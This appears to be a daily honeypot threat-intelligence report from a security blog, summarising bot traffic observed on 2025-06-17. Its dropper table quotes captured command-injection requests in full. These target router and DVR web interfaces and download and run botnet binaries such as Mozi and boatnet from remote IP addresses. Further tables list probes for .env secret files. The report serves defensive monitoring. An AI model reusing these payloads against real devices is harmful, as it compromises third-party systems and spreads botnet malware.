Skip to main content
  1. Daily-Posts/

Report: 2025-06-17

·435 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-17
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 7 stage 1 IP address(es), linked to 7 dropper URL(s).

There are 25 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1310 requests were recorded during the day, originating from 7 different countries, with a peak of 331 requests coming from SC.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany
SGGermany

botnet_dropper_behaviour
#

remote_addrrequest
141.98.11.83GET /shell?cd+/tmp;wget+http://94.26.90.251/payload1.sh+-O-+
45.135.194.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%29+%7C+sh+-s+tplink%3B) HTTP/1.1
144.172.100.214POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.150%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1
45.135.194.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F14.103.145.202%2Frondo.sh%29+%7C+sh+-s+tplink.8080%3B) HTTP/1.1
104.167.221.114POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=echo%20exec%3Bcd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.1
87.121.84.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://31.57.63.48/x/tplink+-O-
42.227.242.19727;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
842GET /.env-hash HTTP/1.1
852GET /.env-cert HTTP/1.1
862GET /.env_mail HTTP/1.1
1062GET /.env-json HTTP/1.1
1281\x00\x0E8\xCB\x87\xEA\xDB7P\x8C\xC0\x00\x00\x00\x00\x00
1521GET /Nmap/folder/check1750123481 HTTP/1.1
1551GET /NmapUpperCheck1750123481 HTTP/1.1
1801GET /nmaplowercheck1750123481 HTTP/1.1
1851GET /LWsF HTTP/1.1
2151GET /.env-snap HTTP/1.1
2161GET /.env_jobs HTTP/1.1
2171GET /.env_keys HTTP/1.1
2181GET /.env_logs HTTP/1.1
2211\x00\x0E8\x10\x8Bs\xE6q\x8BRv\x00\x00\x00\x00\x00
2421GET /.env.bak1 HTTP/1.1
2431GET /.env-saml HTTP/1.1
2441GET /.env-task HTTP/1.1
2451GET /.env.keys HTTP/1.1
2521GET /ru HTTP/1.1
2711GET /de/ HTTP/1.1
2721\x00\x0E8\xEE\xF2b\xB0\xDC\x14\x88\xD2\x00\x00\x00\x00\x00
2931GET /Odin/http/call1750152742 HTTP/1.1
2941GET /OdinHttpCall1750152742 HTTP/1.1
2951GET /odinhttpcall1750152742 HTTP/1.1
3661\x00\x0E8&+1\xC7`i\x9B\xBD\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0331SC
1240US
297GB
379DE
474NL
557FR
656SE
755JP
850KR
947BG
1022CN
1118CH
1217LT
1316CA
1413UA
1513PL
1612EE
1711HU
1811AU
1910NG
2010SG
219RO
226BE
236PT
246IN
254TR
264IL
274MD
283GH
293IT
303AO
313VN
323KZ
332MY
342BR
352ZA
362IE
372RU
381ID
391HK
401MC
411FI
421BD
431ZW
441CZ

Related

Report: 2025-06-16
·760 words
Repport Daily
Report: 2025-06-15
·420 words
Repport Daily
Report: 2025-06-14
·585 words
Repport Daily